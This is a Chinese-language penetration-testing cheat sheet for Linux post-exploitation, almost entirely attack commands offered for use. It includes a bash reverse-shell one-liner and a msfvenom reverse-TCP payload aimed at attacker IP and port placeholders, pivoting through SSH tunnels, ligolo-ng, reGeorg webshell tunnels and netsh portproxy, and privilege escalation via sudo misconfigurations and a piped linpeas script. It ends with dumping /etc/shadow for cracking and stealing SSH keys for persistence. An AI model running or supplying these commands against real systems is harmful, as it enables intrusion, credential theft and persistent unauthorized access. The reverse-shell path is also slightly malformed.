Skip to main content

Linux 後滲透

Reverse shell

  • bash: bash -c 'bash -i >& /dev/IP/PORT 0>&1'
  • Msfvenom
    • msfvenom -p linux/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > s.elf
  • rlwrap 做比較好用的shell
    • rlwrap <reverse shell>

Port Forwarding(端口轉發 代理)

用途:内網橫向、當作跳板

【ATT&CK】端口轉發技術大全 https://mp.weixin.qq.com/s/FNCdKsPwu0_kD-4INn3faQ https://mp.weixin.qq.com/s/zwaeUD7-QMTYgvymgw2EVQ https://github.com/twelvesec/port-forwarding?tab=readme-ov-file

  • proxychains

    • sudo vim /etc/proxychains4.conf
    • socks5 127.0.0.1 9487
    • Usage:proxychains <command>
  • SSH Tunnel

    • Local Port Forwarding:ssh -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]
    • Remote Port Forwarding:ssh -R kali:<port> user@linux host(受害主機)
    • Dynamic Port Forwarding:ssh –D 127.0.0.1:9487 user@hostA(受害主機)
    • socks server
  • ligolo-ng

Host:
sudo ./proxy -autocert
or
sudo ./proxy -selfcert
agent:
./agent -connect [VPS_IP]:11601
or
./agent -connect [VPS_IP]:11601 -ignore-cert
  • Chisel
    • netsh portproxy (Windows)
      • netsh interface portproxy add v4tov4 listenaddress=<ip> listenport=<port> connectaddress=<tgt_ip> connectport=<tgt_port>
  • reGeorg
    • tunnel.ashx 放在目標機上
    • 攻擊機上執行:python2 reGeorgSocksProxy.py -u {url} -p {port}
  • Neo-reGeorg
    • python neoreg.py generate –k 密碼
    • python neoreg.py –k 密碼 –u 網址
  • 多層跳板:Venom

Linux 後滲透

information gathering

  • hostname:電腦的名稱
  • uname -a: 系統的核心版本
  • ps aux / top:電腦的執行 process
  • ifconfig / ip a:電腦的網路資訊
  • pwd:當前的資料夾
  • w:登入的 TTY 資訊
  • cat /etc/passwd:電腦中的使用者資訊

Privilege escalation (提權)

Misconfiguration

  1. sudo -l --> 找 root 能夠執行的 binary
  2. https://gtfobins.github.io/ --> 找該 binary 的提權腳本 --> 根據 sudo -l 確認 sudo 權限能執行的 binary,執行相對應的提權腳本

自動化尋找錯誤配置

  • Linpeas
  1. curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh --> 輸出結果依照組態錯誤或是資訊洩漏,進行相對應的提權手法

拿到root之後

  • cat /etc/shadow
    • dump password hash --> sha512($6$),hashcat 或 john 做爆破。
  • cat ~/.ssh/isa_key
    • 拿key做維持權限
    • ssh -i <key>